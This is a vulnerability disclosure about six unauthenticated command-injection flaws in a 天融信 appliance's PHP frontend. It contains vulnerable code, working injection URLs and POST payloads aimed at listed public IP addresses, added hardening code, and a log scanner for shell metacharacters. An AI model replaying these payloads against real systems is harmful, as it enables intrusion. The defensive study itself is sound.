
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0117621

Title: Six unauthenticated command-execution points in the frontend of a 天融信 system

Vendor: 天融信

Author: 路人甲

Submitted: 2015-06-02 11:39

Fixed: 2015-09-02 17:06

Published: 2015-09-02 17:06

Type: command execution

Severity: high

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)

Favorites: 4


Vulnerability details

Disclosure status:

2015-06-02: Details sent to the vendor; awaiting vendor handling
2015-06-04: Vendor confirmed; details visible to the vendor only
2015-06-07: Details opened to third-party security partners
2015-07-29: Details opened to core white hats and domain experts
2015-08-08: Details opened to regular white hats
2015-08-18: Details opened to intern white hats
2015-09-02: Details disclosed to the public

Brief description:

Six unauthenticated command-execution points in the frontend of a 天融信 system

Detailed description:

bytecache_run_action.php:

<?php
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
require_once dirname(__FILE__)."/../common/UciUtil.inc";
// All three parameters come straight from the query string; no login is required.
$action   = $_GET['action'];
$engine   = $_GET['engine'];
$ipfilter = $_GET['ipfilter'];
if ($action == "1") {
    // Only the derived $ipFilterNum is reshaped; $engine and $ipfilter are passed on untouched.
    $ipFilterArray = split("[/.]", $ipfilter);
    for ($m = 0; $m < 4; $m++) {
        if ($ipFilterArray[$m] > 15) {
            $ipFilterArray[$m] = dechex($ipFilterArray[$m]);
        } else {
            $ipFilterArray[$m] = "0".dechex($ipFilterArray[$m]);
        }
    }

    $ipFilterNum = $ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];
    UciUtil::setValue('appex', 'sys', 'BCDebugEngineId', $engine);
    UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter', $ipfilter);
    startByteCacheDebug($engine, $ipFilterNum);
} else {
    $engine = UciUtil::getValue('appex', 'sys', 'BCDebugEngineId');
    stopByteCacheDebug($engine);
}
?>


First instance: setValue. Following the call:

public static function setValue($package, $config, $option, $value) {
    self::getUciDao()->set($package, $config, $option, $value);
}


Following further:

public function setConfig($package, $config, $value) {
    // $value is concatenated into the command line unquoted and unescaped
    $cmd = UCI_CMD." set ".$package.".".$config."=".$value;
    exec($cmd);
}


This shows that $value is controllable by the requester.
Second instance: startByteCacheDebug($engine, $ipFilterNum). Following the call:

function startByteCacheDebug($engine, $ipFilter) {
    // $engine comes from the query string and is spliced in without quoting
    $command = "/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";
    execute($command);
}


Third instance: when action is not 1, stopByteCacheDebug($engine) runs. Following the call:

function stopByteCacheDebug($engine) {
    // $engine is read back from the UCI store, where it was written from the request
    $command = "/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";
    execute($command);
    //echo $command;
}


Proving one instance is enough:
http://218.206.217.19:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10
Then visit:
http://218.206.217.19:8080/acc/debug/a.php
Fourth instance: change_lan.php

$lanID = 'En';

$refLink = $_SERVER['HTTP_REFERER'];
if (empty($refLink)) {
    $refLink = "/index.php";
}
$refLink = str_replace("?error=1", "", $refLink);
if (array_key_exists('LanID', $_REQUEST)) {
    $lanID = $_REQUEST["LanID"];   // taken from GET or POST as-is
    $appexSystemDao = new AppexSystemDao();
    $appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD, $lanID);
    $appexSystemDao->commit();
    session_start();
    // ... (rest of the file is not shown in the report)
}


Following setAppexSystemConfigItemValue:

public function setAppexSystemConfigItemValue($option, $value) {
    parent::set(UCI_APPEX, "sys", $option, $value);
}


Following further:

public function set($package, $config, $option, $value) {
    // $value is wrapped in single quotes but not escaped, so a quote inside it ends the quoting
    $cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";
    exec($cmd);
}


http://61.148.24.182:8080/change_lan.php
POST data:
LanID=1' | echo ' wooyun' > a.php | '

[Screenshot: 1.png]
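The set() wrapper above shows why quoting alone is not a fix: the value is surrounded by single quotes, but a single quote inside the value closes that string and the shell parses whatever follows. The following is an added example, not code from the report or from the vendor, of how the set()/setConfig() wrappers behind the first and fourth instances could be rewritten. UCI_CMD is the report's own constant; the table of writable options and its value patterns (including 'LanID' as the assumed value of LANGUAGE_ID_FIELD) are illustrative assumptions.

```php
<?php
// Added example: a hardened replacement for the set()/setConfig() wrappers.
// UCI_CMD comes from the report; the option table below is an assumption.

// UCI package/config/option names are identifiers, so they are validated
// against a narrow pattern instead of being escaped.
function isUciIdentifier($name) {
    return is_string($name) && preg_match('/^[A-Za-z0-9_]{1,64}$/', $name) === 1;
}

// Options a web handler may write, each with the pattern its value must
// match. Anything not listed is refused even when the name is well-formed.
function writableOptions() {
    return array(
        'appex.sys.LanID'           => '/^(En|Cn)$/',      // assumed language ids
        'appex.sys.BCDebugEngineId' => '/^[0-9]{1,4}$/',
        'appex.sys.BCDebugIpFilter' => '/^[0-9.]{7,15}$/',
    );
}

// Builds the command or throws; it never returns a string that contains
// unvalidated request data.
function buildUciSetCommand($package, $config, $option, $value) {
    if (!isUciIdentifier($package) || !isUciIdentifier($config) || !isUciIdentifier($option)) {
        throw new InvalidArgumentException('malformed UCI identifier');
    }
    $key = "$package.$config.$option";
    $allowed = writableOptions();
    if (!isset($allowed[$key])) {
        throw new InvalidArgumentException("$key is not writable from the web interface");
    }
    if (!is_string($value) || preg_match($allowed[$key], $value) !== 1) {
        throw new InvalidArgumentException("value rejected for $key");
    }
    // escapeshellarg() escapes embedded quotes as well as wrapping the
    // argument, so "key=value" travels as exactly one argument to uci.
    return UCI_CMD . ' set ' . escapeshellarg("$key=$value");
}

// Drop-in for the original set(): returns true when uci exited with 0.
function uciSet($package, $config, $option, $value) {
    exec(buildUciSetCommand($package, $config, $option, $value), $output, $rc);
    return $rc === 0;
}
```

The value patterns do the real work: a language id or a numeric engine id that contains a shell metacharacter fails its pattern before escapeshellarg() is even reached, and escapeshellarg() remains as the second layer should a pattern later be loosened. The InvalidArgumentException is meant to be caught by the page handler and turned into an HTTP 400 response.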


Fifth instance: enable_tool_debug.php:

<?php
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
// val, tool and par are taken from the query string without any check
$val  = $_GET['val'];
$tool = $_GET['tool'];
$par  = $_GET['par'];
runTool($val, $tool, $par);
?>


runTool:

function runTool($val, $tool, $par) {
    if ($val == "0") {
        UciUtil::setValue('system', 'runtool', 'tool', $tool);
        UciUtil::setValue('system', 'runtool', 'parameter', $par);
        UciUtil::commit('system');
        // $par is concatenated into the ping/traceroute command line unquoted
        if ($tool == "1") {
            exec('ping '.$par.'>/tmp/tool_result &');
        } else if ($tool == "2") {
            exec('traceroute '.$par.'>/tmp/tool_result &');
        }
    } else if ($val == "1") {
        $tool = UciUtil::getValue('system', 'runtool', 'tool');
        if ($tool == "1") {
            exec('killall ping ');
        } else if ($tool == "2") {
            exec('killall traceroute ');
        }
        UciUtil::setValue('system', 'runtool', 'tool', '');
        UciUtil::setValue('system', 'runtool', 'parameter', '');
        UciUtil::commit('system');
        exec('echo "">/tmp/tool_result');
    }
}


http://61.54.222.33:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=172.0.0.1' | echo wooyun > a.php | '

[Screenshot: 2.png]
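The first three instances (bytecache_run_action.php) and this fifth one (enable_tool_debug.php) share one defect: request parameters that are supposed to be an engine id, an IPv4 address, a tool id or a ping target are spliced into a shell command line as raw text. The following is an added example, not code from the report or the vendor, of a single validation layer both pages could call before building any command. The apxdebug.sh path, UciUtil, the 'appex'/'sys' UCI section and /tmp/tool_result are the report's; every function here is this example's own, the "-c 4" bound on ping is an assumption, and it is assumed that UciUtil::setValue itself escapes its arguments and that an authentication check runs before any of this code.

```php
<?php
// Added example: validation and escaping in front of the shell-backed
// handlers. Includes are the report's; assumes UciUtil::setValue is safe.
require_once dirname(__FILE__) . "/../common/commandWrapper.inc";
require_once dirname(__FILE__) . "/../common/UciUtil.inc";

// Small non-negative integer such as an engine id. Returns int or null.
function parseSmallInt($raw, $maxDigits = 4) {
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > $maxDigits) {
        return null;
    }
    return (int)$raw;
}

// Dotted-quad IPv4 literal, or null.
function parseIpv4($raw) {
    if (!is_string($raw)) {
        return null;
    }
    $ip = filter_var($raw, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// IP literal (v4 or v6) or a plain DNS hostname, for ping/traceroute targets.
function parseHost($raw) {
    if (!is_string($raw) || strlen($raw) > 253) {
        return null;
    }
    if (filter_var($raw, FILTER_VALIDATE_IP) !== false) {
        return $raw;
    }
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';   // RFC 1123 label
    return preg_match("/^$label(\\.$label)*$/", $raw) === 1 ? $raw : null;
}

// Eight hex digits for an IPv4 address, the format the original loop built
// by hand with dechex() and a zero-padding special case.
function ipv4ToHex($ip) {
    $hex = '';
    foreach (explode('.', $ip) as $octet) {
        $hex .= sprintf('%02x', (int)$octet);
    }
    return $hex;
}

// Every argument goes through escapeshellarg(): even if a validator above
// is later loosened, a value can only ever be one argument to the program.
function buildStartDebugCommand($engine, $ipFilterHex) {
    return '/tmp/appexcfg/bin/apxdebug.sh start ' . escapeshellarg((string)$engine)
        . ' ' . escapeshellarg($ipFilterHex) . ' >/dev/null &';
}

function buildStopDebugCommand($engine) {
    return '/tmp/appexcfg/bin/apxdebug.sh stop ' . escapeshellarg((string)$engine) . ' &';
}

// The tool id selects a fixed program from a table and is never itself
// concatenated into the command string. "-c 4" (assumed) bounds the run.
function buildToolCommand($tool, $host) {
    $programs = array('1' => 'ping -c 4', '2' => 'traceroute');
    if (!isset($programs[$tool])) {
        return null;
    }
    return $programs[$tool] . ' ' . escapeshellarg($host) . ' >/tmp/tool_result &';
}

// bytecache_run_action.php with the validators applied. Returns the command
// to run, or null when the caller should answer 400 and run nothing.
function handleByteCacheRequest(array $get) {
    $action = isset($get['action']) ? $get['action'] : '';
    if ($action === '1') {
        $engine = parseSmallInt(isset($get['engine']) ? $get['engine'] : '');
        $ip     = parseIpv4(isset($get['ipfilter']) ? $get['ipfilter'] : '');
        if ($engine === null || $ip === null) {
            return null;   // nothing reaches UCI or the shell
        }
        UciUtil::setValue('appex', 'sys', 'BCDebugEngineId', (string)$engine);
        UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter', $ip);
        return buildStartDebugCommand($engine, ipv4ToHex($ip));
    }
    // The stored id was once request input, so it is re-validated on the way out.
    $engine = parseSmallInt((string)UciUtil::getValue('appex', 'sys', 'BCDebugEngineId'));
    return $engine === null ? null : buildStopDebugCommand($engine);
}

// The start branch of enable_tool_debug.php with the validators applied.
function handleToolRequest(array $get) {
    $host = parseHost(isset($get['par']) ? $get['par'] : '');
    $tool = isset($get['tool']) ? $get['tool'] : '';
    return $host === null ? null : buildToolCommand($tool, $host);
}
```

The handlers return the command string rather than executing it so the page can log the exact line it is about to run and refuse with an HTTP 400 on null; the page then passes the string to execute() or exec() as before. Type validation is the primary control and escapeshellarg() the fallback, which is the order a reviewer should look for in any fix the vendor ships.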


Sixth instance: getMacAddr.php:

<?php
include_once dirname(__FILE__).'/../common/commandWrapper.inc';
// the interface name comes from the query string and is used as-is
$tmpeth = $_GET['eth'];
$tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth));
echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="mac" id="mac" value="'.$tmpmacAddr.'" >';
?>


Following getMacAddrFromIfName:

function getMacAddrFromIfName($ifName) {
    // $ifName is only trim()med before being spliced into the shell command
    $mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output');
    if ($mac != null && $mac != '')
        return $mac[0];
    else
        return '';
}


http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |
Then visit http://218.206.217.19:8080/acc/network/c.php.
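Spawning "cat" for a sysfs file is what makes the sixth instance a command injection at all; the same lookup needs no process. The following is an added example, not code from the report or the vendor, of getMacAddr.php rewritten to read /sys/class/net directly. The page name and the 'eth' parameter are the report's; the interface-name pattern and the helper names are this example's.

```php
<?php
// Added example: the MAC lookup without a shell. Only the 'eth' parameter
// and the sysfs path come from the report.

// Linux interface names are at most 15 bytes and cannot contain '/' or
// whitespace; this pattern is stricter still and rejects '.' entirely, so
// no "../" traversal out of /sys/class/net is possible.
function isInterfaceName($name) {
    return is_string($name) && preg_match('/^[A-Za-z0-9_-]{1,15}$/', $name) === 1;
}

// Returns the MAC address as "aa:bb:cc:dd:ee:ff", or null if the input is
// invalid or the interface does not exist. No process is spawned: sysfs is
// a file, so file_get_contents() is all that is needed.
function getMacAddrSafe($ifName) {
    if (!isInterfaceName($ifName)) {
        return null;
    }
    $path = '/sys/class/net/' . $ifName . '/address';
    if (!is_readable($path)) {
        return null;
    }
    $mac = trim((string)file_get_contents($path));
    // Check the output too, before it is echoed into HTML.
    if (preg_match('/^[0-9a-f]{2}(:[0-9a-f]{2}){5}$/', $mac) !== 1) {
        return null;
    }
    return $mac;
}

// The original interpolated the value into the <input> tag raw; here it is
// HTML-escaped, which closes the reflected-output problem as well.
$eth = isset($_GET['eth']) ? $_GET['eth'] : '';
$mac = getMacAddrSafe($eth);
if ($mac === null) {
    http_response_code(400);
    exit('unknown interface');
}
echo '<input type="text" name="mac" id="mac" value="'
    . htmlspecialchars(strtoupper($mac), ENT_QUOTES, 'UTF-8') . '">';
```

The same approach (a filesystem or library call instead of a shell command) applies to any of the report's instances whose command merely reads a file; it removes the bug class rather than escaping around it.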
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
http://61.54.222.33:8080
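For an operator of one of the hosts listed above, the immediate question after disclosure is whether these endpoints were hit before the fix. The following is an added example, not part of the report, that scans web-server access logs for requests to the report's endpoints whose decoded query string contains shell metacharacters. The endpoint paths are the report's; the log lines are constructed for illustration and the combined-log-format parser is this example's own.

```php
<?php
// Added example: flag requests to the report's endpoints whose query string
// carries shell metacharacters. Sample log lines below are constructed.

function reportedEndpoints() {
    return array(
        '/acc/debug/bytecache_run_action.php',
        '/change_lan.php',
        '/acc/tools/enable_tool_debug.php',
        '/acc/network/getMacAddr.php',
    );
}

// None of these parameters (ip addresses, small integers, interface names,
// language ids) legitimately contains any of these characters.
define('SHELL_META', '/[|;&`$<>()\\\\\'"\n]/');

// Minimal parser for the combined log format; returns null for other lines.
function parseAccessLine($line) {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $parts = explode('?', $m[4], 2);
    return array(
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $parts[0],
        // Decode once so %7C and friends are compared as the shell saw them.
        'query'  => isset($parts[1]) ? urldecode($parts[1]) : '',
        'status' => (int)$m[5],
    );
}

// Returns the parsed entries that hit a listed endpoint with a metacharacter
// in the decoded query string.
function findSuspicious(array $lines, array $endpoints) {
    $hits = array();
    foreach ($lines as $line) {
        $e = parseAccessLine($line);
        if ($e === null || !in_array($e['path'], $endpoints, true)) {
            continue;
        }
        if (preg_match(SHELL_META, $e['query']) === 1) {
            $hits[] = $e;
        }
    }
    return $hits;
}

// Constructed sample: a benign request, one with an encoded pipe, and a
// POST to change_lan.php whose body (LanID) is not in the access log.
$sample = array(
    '10.0.0.5 - - [02/Jun/2015:11:39:00 +0800] "GET /acc/network/getMacAddr.php?eth=eth0 HTTP/1.1" 200 120',
    '10.0.0.9 - - [02/Jun/2015:11:40:12 +0800] "GET /acc/network/getMacAddr.php?eth=eth0%7Cid HTTP/1.1" 200 120',
    '10.0.0.9 - - [02/Jun/2015:11:41:30 +0800] "POST /change_lan.php HTTP/1.1" 302 0',
);

foreach (findSuspicious($sample, reportedEndpoints()) as $hit) {
    printf("%s %s %s?%s\n", $hit['time'], $hit['ip'], $hit['path'], $hit['query']);
}
```

Only the second sample line is reported. The third line shows the scan's limit: change_lan.php takes LanID from $_REQUEST, so a POST body never reaches the access log, and that endpoint can only be covered by application-level or proxy request logging. Any hit should also be checked against new files in the web root, since writing a file there is what the report's proofs do.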

Proof of vulnerability:

Remediation:

Copyright notice: please credit 路人甲@乌云 when reproducing.


Vulnerability response

Vendor response:

Severity: low

Vulnerability Rank: 1

Confirmed: 2015-06-04 17:05

Vendor reply:

We have already received this vulnerability report from another site; thank you for your attention.

Latest status:

None